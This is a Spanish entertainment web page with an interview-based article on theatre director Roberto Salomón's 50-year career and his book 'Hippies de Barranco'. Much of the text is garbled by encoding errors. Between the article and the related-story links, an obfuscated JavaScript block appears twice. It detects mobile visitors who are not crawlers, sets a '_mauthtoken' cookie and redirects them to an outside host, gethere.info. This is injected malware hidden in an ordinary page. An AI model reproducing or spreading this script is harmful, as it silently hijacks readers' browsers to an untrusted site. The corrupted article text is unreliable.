Entretenimiento

2 Mar 2016
Entretenimiento | Por: Redacción

50 aAi??os: ai???El teatro me ha salvado la vida varias vecesai???, Roberto SalomA?n, director del Teatro Luis Poma

Texto por: Sara JimAi??nez / FotografAi??as por: Karen MejAi??a

Profesor, consultor, actor y productor de mA?s de sesenta obras teatrales de autores clA?sicos mundialmente reconocidos y actualmente director artAi??stico del Teatro Luis Poma y sobretodo referente durante 50 aAi??os, revolucionando en las mentes de los actores y pA?blico salvadoreAi??o.

AdueAi??A?ndose de sus intereses, a sus 50 aAi??os en las tablas continA?a transmitiendo conocimiento y emociones, esta vez de forma escrita, ai???Hippies de Barrancoai???, trabajo que comenzA? hace 10 aAi??os cuando el periodista y escritor Geovani Galeas comentA? que querAi??a hacer un libro sobre los 40 aAi??os de teatro de SalomA?n.

Entre los planes estaban trabajar juntos, ai???me dio una lista de cosas que yo debAi??a hacer y para esa fecha yo estaba comenzando mi trabajo en el teatro Luis Poma y yo no estaba listo para mirar hacia atrA?s, yo estaba viendo hacia adelanteai???, afirmA?.

El tiempo pasA? y cuando iba a finalizar la dAi??cada de 60 aAi??os de SalomA?n, y ya con 10 aAi??os en el Luis Poma se dio cuenta que ya estaba listo para mirar hacia atrA?s y ver sus incomparables A?ltimos 50 aAi??os de trayectoria.

En el 2010 hizo un trabajo para la FundaciA?n AccesArte, que fue un libro que se ha publicado en Internet, acerca de lo que existe y ha existido de teatro en El Salvador. SalomA?n necesitaba apoyo para hacer la investigaciA?n, por lo que les cuestionA? a sus amigos dramaturgos y fueron ellos quienes le recomendaron a Alejandro CA?rdova, que en ese momento tenAi??a 17 aAi??os.

Juntos planearon el desarrollo de este proyecto luego se propusieron retomar la idea de Galeas, y percibieron otro enfoque. ai???Me propuse a olvidar todo lo que sabAi??a y dejar el trabajo en las manos de alguien de 18 aAi??os, que tiene una manera diferente de ver el mundo y darle lo que Ai??l me pedAi??a en cuanto a documentaciA?nai???, confirmA? SalomA?n.

Ahora ya terminado el libro, se abre el telA?n con una de las recopilaciones y documentaciA?n mA?s significativas en la historia del teatro salvadoreAi??o, que incluye una trayectoria de 50 aAi??os llena de experiencias y emociones transmitidas al pA?blico, ai???el libro Hippies de Barranco, es una visiA?n a travAi??s de mi mirada del teatro de mis A?ltimos 50 aAi??osai???, expresA?.

Uno

En fotografAi??a Roberto SalomA?n se encuentra recibiendo un reconocimiento de las manos de Ricardo Poma,Ai??presidente de FundaciA?n Poma (a su derecha), como muestra del aprecio hacia su labor por el arte y la cultura en El Salvador, a travAi??s del Teatro Luis Poma, del cual FundaciA?n Poma es promotora.

fotoojkosrojos

Seguir su pasiA?n

A sus 70 aAi??os SalomA?n afirmA? ser un apasionado por el teatro y siempre haberle interesado la actuaciA?n, ai???el teatro me ha salvado la vida varias vecesai???, agregA?. Al graduarse de bachillerato se fue a estudiar a la Universidad; sin embargo una de las condiciones de sus padres era que la universidad no tuviera departamento de teatro, pero por suerte del actor, tenAi??a un teatro universitario muy bueno.

Durante su paso por la universidad, SalomA?n comenzA? a actuar a los 21 aAi??os; luego estudiA? Historia del Arte y la Literatura Francesa. Posteriormente, en Estados Unidos, descubriA? su vocaciA?n por la direcciA?n teatral.

Al parecer, todo ha llevado su rumbo, desde que era un niAi??o irreverente de 11 aAi??os sus metas estaban mA?s que definidas; y a pesar de las adversidades y falta de apoyo, el actor ha podido montar y dirigir no solo obras teatrales, sino tambiAi??n su vida. ai???Estando en la Universidad me di cuenta que yo querAi??a ser directorai???, dijo.

A pesar de no haber establecida una formaciA?n de DirecciA?n EscAi??nica, solo existAi??a en los paAi??ses del Este de Europa, sobretodo en la UniA?n SoviAi??tica, su propA?sito siempre se mantuvo; ai???yo vi que la mejor manera de llegar a la DirecciA?n era a travAi??s de la actuaciA?n y me metAi?? hacer actorai???, comentA?.

IMG_6408

El teatro salva la vida

El actor relatA? haber sufrido abusos cuando era niAi??o y adolescente; aclarando que cuando se habla de abusos se piensa solo en abusos sexuales, pero existen emocionales, de poder, de posiciA?n; hay una deontologAi??a de abusos.

ai???Uno sufre traumas y discriminaciA?n y la manera en cA?mo el teatro me salvA? la vida es que yo me refugiAi?? mucho en la ficciA?n, lo que hace mucha gente abusada para salir adelanteai???, asegurA?.

En un paAi??s donde todo se olvida, y donde segA?n SalomA?n los jA?venes carecen de referentes, no es de mucho impacto, validez o fuerza subirse a un escenario a protestar sobre la corrupciA?n que estA? siendo vAi??ctima El Salvador, como lo era hace 50 aAi??os cuando comenzA? a hacer teatro.

Cinco dAi??cadas de experiencias escAi??nicas y vivenciales, pero A?cuA?l ha sido la dificultad o reto mA?s fuerte que se le ha presentado a SalomA?n a lo largo de su trayectoria? ai???cada primer ensayo es el reto mA?s grande de mi vida como actor, como pasas del texto escrito a la acciA?n escAi??nica; ya que es un salto al vacAi??o porque el trabajo artAi??stico es uno de los trabajos mA?s peligrosos psAi??quicamenteai???, agregA?.

Diversidad escenogrA?fica

Una lista de recordables obras sobresalientes, sin embargo, SalomA?n tiene identificadas algunas de las etapas mA?s emblemA?ticas de su trayectoria que lo han llevado a establecer modalidad teatral a lo largo de esas cinco dAi??cadas

La etapa en New York, cuando en plena efervescencia revolucionaria de los aAi??os 68 y mostrando no tener lAi??mites, generA? un encierro en un espacio teatral con cinco actores, es decir que era la escuela, pero a la vez vivAi??an ahAi?? ai???nuestra idea era que el telA?n se abrAi??a y nosotros seguAi??amos viviendo nuestras vidas, como una realidad psicolA?gicaai???, comentA?.

Una etapa mA?s fuerte aquAi?? en El Salvador en 1970 fue: ai???La persecuciA?n y asesinato de Jean Paul Maratai???, conocida como Marat Sade. ai???Esto fue enormeai???, recuerda el actor, porque fue una obra que hizo con 35 alumnos de teatro donde nadie era profesional, compusieron la mA?sica, hicieron el decorado, diseAi??aron los trajes; fue un proyecto que hizo en conjunto con el Bachillerato en Artes.

ai???La casa de Bernarda Albaai??? (1975) que se llevA? a cabo para el primer aAi??o internacional de la mujer, una obra enteramente integrada por mujeres. Ese fue, el evento mA?s importante y marcante de su carrera insipiente, porque se hizo conocer al Bachillerato en Arte.

Una trayectoria que incluye producciones teatrales y espectA?culos nacionales e internacionales, por ejemplo, en Europa; y al regresar a El Salvador, en 1997 realizA? el espectA?culo mA?s grande que se ha hecho aquAi?? en el paAi??s, que fue: ai???El sueAi??o de una noche de veranoai??? de William Shakespeare, en el teatro Nacional, con la ayuda de CONCULTURA, de la empresa privada, de la Embajada de Suiza y del pA?blico.

IMG_6411

 

IdentificaciA?n escAi??nica

Ai??El tema de la familia disfuncional es un tema que ha recorrido todo su trabajo; el tema de la corrupciA?n y el engaAi??o, el tema del amor no correspondido; el tema de cambio de paradigmas, han generado identidad en el actor. ai???En mis puestas en escenas yo busco crear una estAi??tica que cambie o trate de cambiar en el espectador la manera en la que percibe las cosasai???, confirmA? el actor.

Su profesionalismo lo ha sabido dirigir, porque asegura no saber por cuA?l camino va a llegar al final, pero sabe que va a llegar a ese final y sabe a dA?nde quiere llegar; ai???yo no puedo, reemplazar un actor, es de lo mA?s difAi??cil, porque para mAi?? es una parte de un todo, ya que la dinA?mica es lo mA?s importante, las cosas existen en movimiento, como han estado mis 50 aAi??os en las tablasai???, sostuvo.

El teatro es capaz de hacer cosas que el cine o el periodismo no son capaces de hacer y esto es lo que ha demostrado a todos los espectadores el creador de significados: Roberto SalomA?n en sus 50 aAi??os de trayectoria, ai???el trabajo del teatro no es trasladar una noticia al escenario es hacer un trabajo de reflexiA?n sobre una noticia y no de una forma tan directaai???, comentA?.
Ultima

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

15 Jun 2017
ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual
Entretenimiento | Por: Redacción

ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual

26 Jul 2016
Teatro Poma realizarA? homenaje a Shakespeare
Entretenimiento | Por: Redacción

Teatro Poma realizarA? homenaje a Shakespeare

8 Jul 2016
Los mejores memes polAi??ticos de los A?ltimos meses
Entretenimiento | Por: Redacción

Los mejores memes polAi??ticos de los A?ltimos meses

6 Jul 2016
La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje
Entretenimiento | Por: Redacción

La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje